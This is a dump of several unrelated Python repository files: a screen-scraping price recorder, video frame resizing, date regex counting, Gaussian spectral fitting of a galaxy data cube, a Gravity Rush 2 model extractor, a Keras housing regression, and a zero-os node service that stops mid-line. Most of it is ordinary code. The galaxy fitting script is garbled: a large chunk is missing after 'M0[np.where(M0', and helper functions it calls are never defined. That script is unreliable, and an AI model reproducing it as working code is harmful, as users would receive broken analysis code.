{"seq_id":"18139392015","text":"import os \nimport time\n\nfrom numpy import record\n\nimport gui_related\nfrom num_to_record import Recorder\nfrom screen_capture import Screen_Capture\nimport utilities\nfrom visual_processing import Visual_Process\nfrom config_reader import Config_Reader\nfrom gui_related import GUI_functions\nimport pyautogui\n\nclass Execute:\n    def __init__(self):\n        \"\"\"\n        process to create required folders.\n        call utilities for that.\n        \"\"\"\n        utils = utilities.Utilities()\n        self.config = Config_Reader().get_config()\n        utils.create_folder(\"captured_pics\")\n        utils.create_folder(\"pic_to_extract\")\n        utils.create_folder(\"buy_sell_particles\")\n        self.csv_path = self.config[\"path\"][\"csv_path\"]\n\n    def main(self):\n        recorder = Recorder()\n        screen_capture = Screen_Capture()\n        picture_save_path = self.config[\"path\"][\"captured_pics\"]\n        path_data_picture = os.path.join(\"pic_to_extract\",\"data.png\")\n        screen_capture.capture(picture_save_path)\n        GUI_func = GUI_functions()\n        sell_image_path = os.path.join(\"buy_sell_particles\",\"sell.png\")\n        buy_image_path = os.path.join(\"buy_sell_particles\",\"buy.png\")\n        coordinates_sell = GUI_func.get_coordinates(sell_image_path)\n        coordinates_buy = GUI_func.get_coordinates(buy_image_path)\n        cropped_buy = screen_capture.crop_captured(coordinates_buy)\n        cropped_sell = screen_capture.crop_captured(coordinates_sell)\n        visual_process = Visual_Process()\n        screen_capture.save_image(cropped_sell,path_data_picture)\n        result1 = visual_process.read_pic_from_path(path_data_picture)\n        price = visual_process.easyocr_result_interpreter(result1)\n        print(price)\n        #visual_process.easyocr_result_interpreter(result2)\n        recorder.record(price,self.csv_path)\n\n\n    def test_main(self):\n        test_image_path_sell = os.path.join(\"test_pics\",\"sell.png\")\n        test_image_path_buy = os.path.join(\"test_pics\",\"buy.png\")\n        utils = utilities.Utilities()\n        utils.create_folder(\"captured_pics\")\n        config = Config_Reader().get_config()\n        sell_image_path = os.path.join(\"buy_sell_particles\",\"sell.png\")\n        buy_image_path = os.path.join(\"buy_sell_particles\",\"buy.png\")\n        picture_save_path = config[\"path\"][\"captured_pics\"]\n        print(picture_save_path)\n        print(type(picture_save_path))\n        Screen_Capture().capture(picture_save_path)\n        GUI_func = GUI_functions()\n        coordinates_sell = GUI_func.get_coordinates(sell_image_path)\n        coordinates_buy = GUI_func.get_coordinates(buy_image_path)\n        print(coordinates_buy)\n        print(coordinates_buy[0],coordinates_buy[1],\"coords xy\")\n        print(coordinates_sell)\n        print(type(coordinates_buy))\n        visual_process = Visual_Process()\n        result1 = visual_process.read_pic(test_image_path_buy)\n        result2 = visual_process.read_pic(test_image_path_sell)\n        visual_process.easyocr_result_interpreter(result1)\n        visual_process.easyocr_result_interpreter(result2)\n        cropped_buy = Screen_Capture().crop_captured(coordinates_buy)\n        cropped_sell = Screen_Capture().crop_captured(coordinates_sell)\n\n        \"\"\"\n        GUI_func.click_pic(sell_image_path)\n        time.sleep(3)\n        GUI_func.click_pic(buy_image_path)\n        \"\"\"\n\n\nif __name__ == \"__main__\":\n    executer = Execute()\n    while True:\n        executer.main()\n        time.sleep(60)","repo_name":"LulutasoAI/financial_data_gathering","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"37528737230","text":"import cv2\r\ndef split_frames(filename, output_str):\r\n    capture = cv2.VideoCapture(filename)\r\n    i = 0\r\n    while(capture.isOpened()):\r\n        ret, frame = capture.read()\r\n        if ret == False:\r\n            break\r\n        if i == 20:\r\n            break\r\n        cv2.imwrite(output_str.format(i),frame)\r\n        i += 1\r\n    capture.release()\r\nsplit_frames('xilogravura.mp4', 'frame-{}.jpg')\r\nsrc = cv2.imread('frame-0.jpg', cv2.IMREAD_UNCHANGED)\r\n#percent by which the image is resized\r\nscale_percent = 50\r\n#calculate the 50 percent of original dimensions\r\nwidth = int(src.shape[1] * scale_percent / 100)\r\nheight = int(src.shape[0] * scale_percent / 100)\r\n# dsize\r\ndsize = (width, height)\r\n# resize image\r\noutput = cv2.resize(src, dsize)\r\ncv2.imwrite('D:/cv2-resize-image-50.png',output)\r\ncv2.imwrite('c:/ArteMaisComp/novo_frame-0.jpg',output)\r\ncv2.destroyAllWindows()\r\n","repo_name":"KinsleyDavis/ArtMaisComp","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"37086377493","text":"import re\nfrom datetime import datetime\n\n# Read the source file\nwith open('dates.txt', 'r') as file:\n    text = file.read()\n\n# Find dates in the DD.MM.YYYY and DD/MM/YYYY formats\npattern1 = r'\\b\\d{2}\\.\\d{2}\\.\\d{4}\\b'\npattern2 = r'\\b\\d{2}/\\d{2}/\\d{4}\\b'\ndates1 = re.findall(pattern1, text)\ndates2 = re.findall(pattern2, text)\n
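\n# Added example: '31.12.2023' matches pattern1 and '28/02/2024' matches pattern2;\n# the \\b anchors require the dates to stand on their own word boundaries.\n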
\n# Count how many dates were found in each format\ncount1 = len(dates1)\ncount2 = len(dates2)\n\n# Collect the February dates written in the DD/MM/YYYY format\nfebruary_dates = []\nfor date in dates2:\n    try:\n        parsed_date = datetime.strptime(date, '%d/%m/%Y')\n        if parsed_date.month == 2:\n            february_dates.append(date)\n    except ValueError:\n        pass\n\n# Write the February dates (DD/MM/YYYY) to a new file\nwith open('february_dates.txt', 'w') as file:\n    file.write('\\n'.join(february_dates))\n\n# Print the results\nprint(f\"Number of dates in the DD.MM.YYYY format: {count1}\")\nprint(f\"Number of dates in the DD/MM/YYYY format: {count2}\")\nprint(\"The February dates in the DD/MM/YYYY format were saved to 'february_dates.txt'.\")\n","repo_name":"Caucasus1/Proi_1sem_Sungurov","sub_path":"pz_14/pz_14.py","file_name":"pz_14.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"42130560517","text":"#import python libraries\nimport numpy as np \nimport matplotlib.pyplot as plt\nimport astropy.io.fits as fits\nimport astropy.wcs as wcs\nimport os \nimport time\n#from astropy.nddata import Cutout2D\nfrom scipy import ndimage\nimport astropy.constants as K\nimport astropy.units as u\nfrom astropy.cosmology import Planck15 as p15\nimport scipy.ndimage\nfrom lmfit import minimize, Parameters, report_fit\nfrom heapq import nlargest\nimport concurrent.futures\n\n\npath = os.path.dirname(os.path.abspath('__file__'))\n\n\nfilefits_data = 'NGC6810_crop.fits'\nfilefits_antenna = 'NGC6810_antenna.fits'\ndatacube = fits.open(path+'/file/'+filefits_data)[0]\ndatacube_antenna = fits.open(path+'/file/'+filefits_antenna)[0]\ndatacube.data = np.squeeze(datacube.data)\ndatacube_antenna.data = np.squeeze(datacube_antenna.data)\nNz,Ny,Nx = datacube.shape\nprint (Nz, Ny, Nx)\n\n\n#define the z-axis which corresponds to frequency\nnaxis3 = datacube.header['NAXIS3']\ncrpix3 = datacube.header['CRPIX3']\ncrval3 = datacube.header['CRVAL3']\ncdelt3 = datacube.header['CDELT3']\n\nkk = 1+np.arange(naxis3)\n\nfrequency = crval3+cdelt3*(kk-crpix3) #Hz\nfrequency /= 1e9 #GHz\n\nprint(frequency[:10])\n\n\n#define the z-axis in velocity units\n#average frequency\nfrequency_mean = np.mean(frequency)*u.GHz\nprint(frequency_mean)\n\n\n\n\n#z = v/c = (nu_emit - nu_obs)/nu_obs\nvelocity_unit = ((frequency_mean- (frequency*u.GHz))/(frequency*u.GHz))*K.c.to('km/s')\nprint(velocity_unit[:10])\nvelocity = velocity_unit.value\nprint(velocity[:10])\ndv = velocity[0]-velocity[1]\n\n#location of the target\nx0,y0 = 250, 250\n#size of the square aperture\ndl = 100\n#extract the spectrum\n#total spectrum\nspectrum = np.nansum(datacube.data[:,y0-dl:y0+dl,x0-dl:x0+dl],axis = (1,2))\n#1plot: frequency - spectrum\n\n\n\n\n\n## RMS DETERMINATION WITH THE POWER RESPONSE \n\n#data/power response\nnoise_cube = datacube.data / datacube_antenna.data\n\n#Choosing an empty region\nx0, y0 = 294, 143\ndl = 20\nnoise = noise_cube[:,y0-dl:y0+dl,x0-dl:x0+dl]\nerror = np.std(noise[1:,:,:])\n\nprint(\"rms = {:.2f} mJy\".format(error))\nprint(\"####################\")\n
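\n# Added note: residual() below evaluates a sum of p Gaussian components,\n#     model(x) = sum_k amp_k * exp(-(x - cen_k)**2 / (2 * wid_k**2)),\n# and, when sigma is supplied, returns (model - data) / sigma for the least-squares fit.\n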
\n\n## Multi-gaussians model\ndef residual(pars, x, p, data=None, sigma=None):\n    argu1 = (x - pars['cen_g1'])**2 / (2*(pars['wid_g1'])**2)\n\n\n    if p == 1:\n        model = pars['amp_g1'] * np.exp(-argu1)\n    if p == 2:\n        argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n        model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2'] * np.exp(-argu2))\n    if p == 3:\n        argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n        argu3 = (x - pars['cen_g3'])**2 / (2*(pars['wid_g3'])**2)\n        model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2']*np.exp(-argu2) + pars['amp_g3'] * np.exp(-argu3))\n    if p == 4:\n        argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n        argu3 = (x - pars['cen_g3'])**2 / (2*(pars['wid_g3'])**2)\n        argu4 = (x - pars['cen_g4'])**2 / (2*(pars['wid_g4'])**2)\n        model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2']*np.exp(-argu2) + pars['amp_g3']*np.exp(-argu3) + pars['amp_g4']*np.exp(-argu4))\n    if p == 5:\n        argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n        argu3 = (x - pars['cen_g3'])**2 / (2*(pars['wid_g3'])**2)\n        argu4 = (x - pars['cen_g4'])**2 / (2*(pars['wid_g4'])**2)\n        argu5 = (x - pars['cen_g5'])**2 / (2*(pars['wid_g5'])**2)\n        model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2']*np.exp(-argu2) + pars['amp_g3']*np.exp(-argu3) + pars['amp_g4']*np.exp(-argu4) + pars['amp_g5']*np.exp(-argu5))\n\n    if data is None:\n        return model\n    if sigma is None:\n        return model - data\n    return (model - data) / sigma\n\nx = velocity\ndata = spectrum\n\n\n##Making the Spiral grid for fitting\ndef invers_spiral(A):\n    return A[::-1]  # inverting the array, so it starts from the center\n\ndef spiral_mat_to_vect(A):\n    v = []\n    while(A.size != 0):\n        v.append(A[0,:])\n        A = A[1:,:].T[::-1]\n    return np.concatenate(v)\n\ndef spiral_vect_to_mat(v):\n    L = int(np.sqrt(v.size))  # length of the piece to add\n    l = L\n    A = np.zeros((L,L))\n    i = 3  # start from 3 so that the x coordinate grows at the second step\n    x = 0  # x coordinate of the new piece\n    y = 0  # y coordinate of the new piece\n\n    A[x,y:l] = v[0:l]\n    A = A.T[::-1]\n    v = v[l:len(v)]\n\n    while(v.size != 0):\n        i += 1  # At every step, rotate and fill the first row of the matrix\n        if i % 2 == 0:  # Every two rotations the length l shrinks\n            l -= 1\n        if (i + 1) % 4 == 0:  # Every 4 rotations x grows\n            x += 1\n        if i % 4 == 0:  # Every 4 rotations y grows, lagging one step behind x\n            y += 1\n        A[x,y:y+l] = v[0:l]\n        A = A.T[::-1]\n        v = v[l:len(v)]\n\n    for rotations in range(i % 4):  # Do the remaining rotations to put the matrix back the right way round\n        A = A.T[::-1]\n\n    return A\n\n\n#Generating moments map\n\n# datacube.data = np.where(datacube.data<0, 0*datacube.data, datacube.data)\nmask_cube = np.where(datacube.data > 3*error, datacube.data, np.nan)\nM0 = np.nansum(datacube.data, axis = (0))*dv\n\nM1 = np.nansum(datacube.data[:,:,:]*velocity[:,np.newaxis,np.newaxis], axis=0)*dv / M0\nthr = 3*error\nM0[np.where(M0 3*error): #fitspiral1\n        if flux_map_tmp[jj,ii]>5*error:\n            spec_tmp = datacube.data[:,jj,ii]\n            spec_tmp = np.nan_to_num(spec_tmp)\n            spec_tmp[0]=0\n\n            ##FIT WITH 1 GAUSSIAN\n            if jj > 1.14777 * ii + 20:  #the pixel above the galaxy diagonal\n                velmax = 50  #limit to select the blueshifted pixel\n                velmin = -300\n            else:\n                velmax = 300\n                velmin=-50\n\n            fit_params1gx.add('cen_g1', value=M1[jj,ii], min = velmin, max= velmax)\n            fit_params1gx.add('wid_g1', value=M2[jj,ii], min = 10, max = 300)\n            fit_params2gx.add('cen_g1', value=M1[jj,ii], min = velmin, max= velmax)\n\n\n            tmp_res1 = executor.submit(compute1, residual, fit_params1g, x, 1, spec_tmp, error)\n            tmp_res2 = executor.submit(compute2, residual, fit_params2g, x, 2, spec_tmp, error)\n            tmp_res1x = executor.submit(compute1x, residual, fit_params1gx, x, 1, spec_tmp, error)\n            tmp_res2x = executor.submit(compute2x, residual, fit_params2gx, x, 2, spec_tmp, error)\n            out_1g, fit1, bic_1g = tmp_res1.result()\n            out_2g, fit2, bic_2g = tmp_res2.result()\n            out_1gx, fit1x, bic_1gx = tmp_res1x.result()\n            out_2gx, fit2x, bic_2gx = tmp_res2x.result()\n            \"\"\"\n            out1, fit1 = compute(residual, fit_params1g, x, 1, spec_tmp, error)\n            out2, fit2 = 
compute(residual, fit_params2g, x, 2, spec_tmp, error)\n out1x, fit1x = compute(residual, fit_params1gx, x, 1, spec_tmp, error)\n out2x, fit2x = compute(residual, fit_params2gx, x, 2, spec_tmp, error)\n \"\"\"\n \n mod1[:,jj,ii] = fit1\n fit_params1g.add('amp_g1', value=out_1g[0], min = 0.0025, max= 0.1)\n fit_params1g.add('cen_g1', value=out_1g[1], min = velmin, max= velmax)\n fit_params1g.add('wid_g1', value=out_1g[2], min = 10, max = 300)\n\n mod2[:,jj,ii] = fit2\n \n fit_params2g.add('amp_g1', value=out_2g[0], min = 0.0025, max= 0.1)\n fit_params2g.add('cen_g1', value=out_2g[1], min = velmin, max= velmax)\n fit_params2g.add('wid_g1', value=out_2g[2], min = 10, max = 200)\n fit_params2g.add('amp_g2' , value=out_2g[3], min= 0.0025, max= 0.1)\n fit_params2g.add(name=('cen_g2'), expr='peak_split+cen_g1')\n fit_params2g.add('wid_g2', value=out_2g[5], min =10, max= 200)\n\n \n ##FIT CON 1 GAUSSIANA con velocità iniziale data dal momento 1\n \n mod1x[:,jj,ii] = fit1x\n fit_params1gx.add('amp_g1', value=out_1gx[0], min = 0.0025, max= 0.1)\n\n \n ##FIT CON 2 GAUSSIANE con velocità iniziale data dal momento1\n mod2x[:,jj,ii] = fit2x\n \n fit_params2gx.add('amp_g1', value=out_2gx[0], min = 0.0025, max= 0.1)\n fit_params2gx.add('wid_g1', value=out_2gx[2], min = 10, max = 200)\n fit_params2gx.add('amp_g2' , value=out_2gx[3], min= 0.0025, max= 0.1)\n fit_params2gx.add(name=('cen_g2'), expr='peak_split+cen_g1')\n fit_params2gx.add('wid_g2', value=out_2gx[5], min =10, max= 200)\n \n if jj in range1 and ii in range2:\n # if bic_1g < bic_2g and bic_1g < bic_3g and bic_2g - bic_1g > 2.3 and bic_3g - bic_1g > 2.3:\n bic_min = np.min([bic_1g, bic_2g, bic_1gx, bic_2gx])\n if bic_1g == bic_min: \n flux_map[jj,ii] = np.nansum(fit1) * dv\n vel_map[jj,ii] = np.nansum((fit1*velocity)) * dv / flux_map[jj,ii]\n vdisp_map[jj,ii] = np.nansum((fit1*(velocity-vel_map[jj,ii])**2)) * dv / flux_map[jj,ii]\n vdisp_map[jj,ii] = vdisp_map[jj,ii]**0.5\n mod[:,jj,ii] = mod1[:,jj,ii]\n elif bic_2g == bic_min: \n flux_map[jj,ii] = np.nansum(fit2) * dv\n vel_map[jj,ii] = np.nansum((fit2*velocity)) * dv/flux_map[jj,ii]\n vdisp_map[jj,ii] = np.nansum((fit2*(velocity-vel_map[jj,ii])**2)) * dv /flux_map[jj,ii] \n vdisp_map[jj,ii] = vdisp_map[jj,ii]**0.5\n mod[:,jj,ii] = mod2[:,jj,ii]\n elif bic_1gx == bic_min:\n flux_map[jj,ii] = np.nansum(fit1x) * dv \n vel_map[jj,ii] = np.nansum((fit1x*velocity)) * dv / flux_map[jj,ii]\n vdisp_map[jj,ii] = np.nansum((fit1x*(velocity-vel_map[jj,ii])**2)) * dv / flux_map[jj,ii]\n vdisp_map[jj,ii] = vdisp_map[jj,ii]**0.5\n mod[:,jj,ii] = mod1x[:,jj,ii]\n elif bic_2gx == bic_min:\n flux_map[jj,ii] = np.nansum(fit2x) * dv \n vel_map[jj,ii] = np.nansum((fit2x*velocity)) * dv / flux_map[jj,ii]\n vdisp_map[jj,ii] = np.nansum((fit2x*(velocity-vel_map[jj,ii])**2)) * dv / flux_map[jj,ii]\n vdisp_map[jj,ii] = vdisp_map[jj,ii]**0.5\n mod[:,jj,ii] = mod2x[:,jj,ii]\n# flux_map[flux_map_tmp<5*error] = np.nan\n# vel_map[flux_map_tmp < 5*error] = np.nan\n# vdisp_map[flux_map_tmp < 5*error] = np.nan \n \nplt.figure(figsize = (12,4))\n\nplt.subplot(131)\nplt.imshow(flux_map, origin = 'lower', cmap = 'jet')\nplt.colorbar(shrink = 0.7)\nplt.subplot(132)\nplt.imshow(vel_map, origin = 'lower', vmin = -300, vmax = 300, cmap ='jet')\nplt.colorbar(shrink = 0.7)\nplt.subplot(133)\nplt.imshow(vdisp_map, origin = 'lower', vmin = 0, vmax =200, cmap = 'jet')\nplt.colorbar(shrink = 0.7)\n\nflux = flux_map\nfor jj in range (Ny):\n for ii in range(Nx):\n if jj < 1.22 * ii - 300:\n flux[jj,ii] = np.nan\n\nvel = vel_map\nfor jj in 
range (Ny):\n for ii in range(Nx):\n if jj < 1.22 * ii - 300:\n vel[jj,ii] = np.nan\n \ndisp = vdisp_map\nfor jj in range (Ny):\n for ii in range(Nx):\n if jj < 1.22 * ii - 300:\n disp[jj,ii] = np.nan\n\nplt.figure(figsize = (12,4))\n\nplt.subplot(131)\nplt.imshow(flux, origin = 'lower', cmap = 'jet')\nplt.colorbar(shrink = 0.7)\nplt.subplot(132)\nplt.imshow(vel, origin = 'lower', vmin = -300, vmax = 300, cmap ='jet')\nplt.colorbar(shrink = 0.7)\nplt.subplot(133)\nplt.imshow(disp, origin = 'lower', vmin = 0, vmax =200, cmap = 'jet')\nplt.colorbar(shrink = 0.7)\n\nhdu = fits.PrimaryHDU(mod)\nhdul = fits.HDUList([hdu])\nhdul.writeto('model_3_2gx.fits')\n\n\nhdu = fits.PrimaryHDU(flux_map)\nhdul = fits.HDUList([hdu])\nhdul.writeto('flux_map_spiral_3_2gx.fits')\nhdu = fits.PrimaryHDU(vel_map)\nhdul = fits.HDUList([hdu])\nhdul.writeto('vel_map_spiral_3_2gx.fits')\nhdu = fits.PrimaryHDU(vdisp_map)\nhdul = fits.HDUList([hdu])\nhdul.writeto('vdisp_map_spiral_3_2gx.fits')\n\n","repo_name":"taurosss/Galaxy_outflow_final","sub_path":"spiral_fit_2gx_parallel.py","file_name":"spiral_fit_2gx_parallel.py","file_ext":"py","file_size_in_byte":17155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14231984166","text":"# Noesis Gravity Rush 2 .evb Extractor\n\nfrom inc_noesis import *\nimport noesis\nimport rapi\nimport os\n\ndebug = False\nglobal_scale = 100\n\ndef registerNoesisTypes():\n\n handle = noesis.register('Gravity Rush 2 evb database', '.evb')\n noesis.setHandlerTypeCheck(handle, noepyCheckType)\n noesis.setHandlerLoadModel(handle, noepyLoadModel)\n if debug:\n noesis.logPopup() # please comment out when done.\n return 1\n\n\ndef noepyCheckType(data):\n file = NoeBitStream(data)\n if len(data) < 4:\n return 0\n header = file.readBytes(4).decode('ASCII').rstrip(\"\\0\")\n if header == 'FBKK':\n return 1\n return 0\n\n# loading the bones!\n\n\ndef noepyLoadModel(data, mdlList):\n global bs\n bs = NoeBitStream(data)\n\n global bones\n bones = []\n\n bs.seek(0x38, NOESEEK_ABS)\n file_name = loadStringFromPointer(bs.readUInt())\n print(\"Filename: \" + file_name)\n bs.seek(0x24, NOESEEK_REL)\n num_of_data_chunk = bs.readUInt()\n bs.seek(bs.readUInt() - 4, NOESEEK_REL)\n for dataChunkIndex in range(num_of_data_chunk):\n readDataChunk(bs.readUInt())\n\n mdl = NoeModel()\n mdl.setBones(bones)\n mdlList.append(mdl)\n return 1\n\n\ndef readDataChunk(offset):\n origonal_offset = bs.tell()\n bs.seek(offset - 4, NOESEEK_REL)\n print(\"Loading Data Chunk at \" + hex(bs.tell()))\n # print(\"Upstream - \" + hex(origonal_offset))\n # print(\"offset - \" + hex(offset))\n bs.seek(0x08, NOESEEK_REL)\n name = loadStringFromPointer(bs.readUInt())\n print(\"Data Chunk name: \" + name)\n bs.seek(0x24, NOESEEK_REL)\n subdata_chunk_count = bs.readUInt()\n subindex_chunk_location = bs.tell() + bs.readUInt()\n bs.seek(0x18, NOESEEK_REL)\n # Loading root bone\n rotation = NoeQuat.fromBytes(bs.readBytes(16))\n translation = NoeVec3.fromBytes(bs.readBytes(12)) * NoeVec3((global_scale, global_scale, global_scale))\n bs.seek(4, NOESEEK_REL)\n scale = NoeVec3.fromBytes(bs.readBytes(12))\n boneMat = rotation.toMat43(transposed=1)\n boneMat[3] = translation\n boneIndex = len(bones)\n bones.append(NoeBone(boneIndex, name, boneMat))\n bs.seek(0x18, NOESEEK_REL)\n parent_name = loadStringFromPointer(bs.readUInt())\n print(\"Parent name: \" + parent_name)\n # Loading Sub Index Chunk\n bs.seek(subindex_chunk_location, NOESEEK_ABS)\n for subDataChunkIndex in 
range(subdata_chunk_count):\n readSubDataChunk(bs.readUInt(), boneIndex)\n bs.seek(origonal_offset, NOESEEK_ABS)\n return\n\n\ndef readSubDataChunk(offset, parentBoneIndex):\n origonal_offset = bs.tell()\n bs.seek(offset - 4, NOESEEK_REL)\n print(\"Loading Sub Data Chunk at \" + hex(bs.tell()))\n bs.seek(0x08, NOESEEK_REL)\n name = loadStringFromPointer(bs.readUInt())\n print(\"Sub Data Chunk name: \" + name)\n bs.seek(0x0C, NOESEEK_REL)\n bs.seek(bs.readUInt() - 4, NOESEEK_REL)\n # Loading bone\n rotation = NoeQuat.fromBytes(bs.readBytes(16))\n translation = NoeVec3.fromBytes(bs.readBytes(12)) * NoeVec3((global_scale, global_scale, global_scale))\n bs.seek(4, NOESEEK_REL)\n scale = NoeVec3.fromBytes(bs.readBytes(12))\n boneMat = rotation.toMat43(transposed=1)\n boneMat[3] = translation\n #boneMat *= bones[parentBoneIndex].getMatrix() \n boneIndex = len(bones)\n bones.append(NoeBone(boneIndex, name, boneMat, None, parentBoneIndex))\n\n bs.seek(origonal_offset, NOESEEK_ABS)\n return\n\n\ndef loadStringFromPointer(offset):\n origonal_offset = bs.tell()\n bs.seek(offset - 4, NOESEEK_REL)\n string = bs.readBytes(64).split(b'\\x00')[0].decode('UTF8')\n bs.seek(origonal_offset, NOESEEK_ABS)\n return string\n","repo_name":"Team-Alua/GR2-evb-extractor","sub_path":"GravityRush2_evb.py","file_name":"GravityRush2_evb.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73202436625","text":"from keras import models\nfrom keras import layers\nfrom keras.datasets import boston_housing\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef get_model():\n\tmodel = models.Sequential()\n\tmodel.add(layers.Dense(64, activation=\"relu\", input_shape=(train_data.shape[1],)))\n\tmodel.add(layers.Dense(64, activation=\"relu\"))\n\t# No activation on the last layer as it is purely linear value\n\tmodel.add(layers.Dense(1))\n\t# mse - mean squared error - good for regression problems\n\t# mae + mean absolute error - the absolute value of the difference between predictions and targets\n\tmodel.compile(optimizer=\"rmsprop\", loss=\"mse\", metrics=[\"mae\"])\n\treturn model\n\n\ndef smooth_curve(points, factor=0.9):\n\tsmoothed_points = []\n\tfor point in points:\n\t\tif smoothed_points:\n\t\t\tprevious = smoothed_points[-1]\n\t\t\tsmoothed_points.append(previous * factor + point * (1 - factor))\n\t\telse:\n\t\t\tsmoothed_points.append(point)\n\treturn smoothed_points\n\n(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()\n\nmean = train_data.mean(axis=0)\ntrain_data -= mean\nstd = train_data.std(axis=0)\ntrain_data /= std\n\n\n# k-fold validation\nk = 4\nnum_val_samples = len(train_data) // k\nnum_epochs = 100\nall_mae_histories = []\n\n\nfor i in range(k):\n\tprint(\"Processing fold #\", i)\n\tval_data = train_data[i * num_val_samples: (i +1) * num_val_samples]\n\tval_targets = train_targets[i * num_val_samples: (i +1) * num_val_samples]\n\n\tpartial_train_data = np.concatenate(\n\t\t[train_data[:i * num_val_samples],\n\t\ttrain_data[(i + 1) * num_val_samples:]],\n\t\taxis=0)\n\n\tpartial_train_targets = np.concatenate(\n\t\t[train_targets[:i * num_val_samples],\n\t\ttrain_targets[(i + 1) * num_val_samples:]],\n\t\taxis=0)\n\n\tprint(\"Num val samples: \", num_val_samples)\n\tprint(\"Partial train: \", len(partial_train_data))\n\n\tmodel = get_model()\n\thistory = model.fit(\n\t\tpartial_train_data, \n\t\tpartial_train_targets, \n\t\tvalidation_data=(val_data, 
val_targets),\n\t\tepochs=num_epochs, \n\t\tbatch_size=1, \n\t\tverbose=0)\n\n\tprint(history.history)\n\tmae_history = history.history[\"mean_absolute_error\"]\n\tall_mae_histories.append(mae_history)\n\naverage_mae_history = [np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]\n\nplt.plot(range(1, len(average_mae_history) + 1), average_mae_history)\nplt.xlabel([\"Epochs\"])\nplt.ylabel([\"Validation MAE\"])\nplt.show()\n\nplt.clf()\n\nsmooth_mae_history = smooth_curve(average_mae_history[10:])\nplt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)\nplt.xlabel([\"Epochs\"])\nplt.ylabel([\"Validation MAE\"])\nplt.show()\n\n","repo_name":"KasparPeterson/deep-learning-with-python","sub_path":"house_prices.py","file_name":"house_prices.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2117636411","text":"from js9 import j\n\n\ndef get_stats_collector(service):\n stats_collectors_services = service.consumers.get('stats_collector')\n if stats_collectors_services:\n return stats_collectors_services[0]\n\n\ndef get_statsdb(service):\n statsdb_services = service.aysrepo.servicesFind(role='statsdb')\n if statsdb_services:\n return statsdb_services[0]\n\n\ndef get_version(job):\n from zeroos.orchestrator.sal.Node import Node\n from zeroos.orchestrator.configuration import get_jwt_token\n service = job.service\n if service.model.data.status != 'running':\n version = ''\n else:\n node = Node.from_ays(service, get_jwt_token(job.service.aysrepo))\n pong = node.client.ping()\n version = pong.split('Version: ')[1] if pong else ''\n\n service.model.data.version = version\n service.saveAll()\n return version\n\n\ndef input(job):\n from zeroos.orchestrator.sal.Node import Node\n from zeroos.orchestrator.configuration import get_configuration, get_jwt_token\n\n args = job.model.args\n ip = args.get('redisAddr')\n node = Node(ip, args.get('redisPort'), get_jwt_token(job.service.aysrepo))\n\n config = get_configuration(job.service.aysrepo)\n version = node.client.info.version()\n core0_version = config.get('0-core-version')\n core0_revision = config.get('0-core-revision')\n\n if (core0_version and core0_version != version['branch']) or \\\n (core0_revision and core0_revision != version['revision']):\n raise RuntimeError(\n 'Node with IP {} has a wrong version. 
Found version {}@{} and expected version {}@{} '.format(\n ip, version['branch'], version['revision'], core0_version, core0_revision))\n\n\ndef init(job):\n from zeroos.orchestrator.sal.Node import Node\n from zeroos.orchestrator.configuration import get_jwt_token\n\n service = job.service\n node = Node.from_ays(service, get_jwt_token(service.aysrepo))\n job.logger.info('create storage pool for fuse cache')\n poolname = '{}_fscache'.format(service.name)\n\n storagepool = node.ensure_persistance(poolname)\n storagepool.ays.create(service.aysrepo)\n\n statsdb_service = get_statsdb(service)\n if statsdb_service:\n stats_collector_actor = service.aysrepo.actorGet('stats_collector')\n args = {\n 'node': service.name,\n 'port': statsdb_service.model.data.port,\n 'ip': statsdb_service.parent.model.data.redisAddr,\n\n }\n stats_collector_service = stats_collector_actor.serviceCreate(instance=service.name, args=args)\n stats_collector_service.consume(service)\n\n\ndef getAddresses(job):\n service = job.service\n networks = service.producers.get('network', [])\n networkmap = {}\n for network in networks:\n networkmap[network.name] = network.executeAction('getAddresses', args={'node_name': service.name})\n return networkmap\n\n\ndef install(job):\n from zeroos.orchestrator.sal.Node import Node\n from zeroos.orchestrator.configuration import get_jwt_token\n\n job.context['token'] = get_jwt_token(job.service.aysrepo)\n\n # at each boot recreate the complete state in the system\n service = job.service\n node = Node.from_ays(service, get_jwt_token(job.service.aysrepo))\n get_version(job)\n job.logger.info('mount storage pool for fuse cache')\n poolname = '{}_fscache'.format(service.name)\n node.ensure_persistance(poolname)\n\n # Set host name\n node.client.system('hostname %s' % service.model.data.hostname).get()\n node.client.bash('echo %s > /etc/hostname' % service.model.data.hostname).get()\n\n job.logger.info('configure networks')\n for network in service.producers.get('network', []):\n network.executeAction('configure', args={'node_name': service.name})\n\n stats_collector_service = get_stats_collector(service)\n statsdb_service = get_statsdb(service)\n if stats_collector_service and statsdb_service and statsdb_service.model.data.status == 'running':\n stats_collector_service.executeAction('install', context=job.context)\n node.client.bash('modprobe ipmi_si && modprobe ipmi_devintf').get()\n\n\ndef monitor(job):\n from zeroos.orchestrator.sal.Node import Node\n from zeroos.orchestrator.sal.healthcheck import HealthCheckObject\n from zeroos.orchestrator.configuration import get_jwt_token, get_configuration\n\n service = job.service\n config = 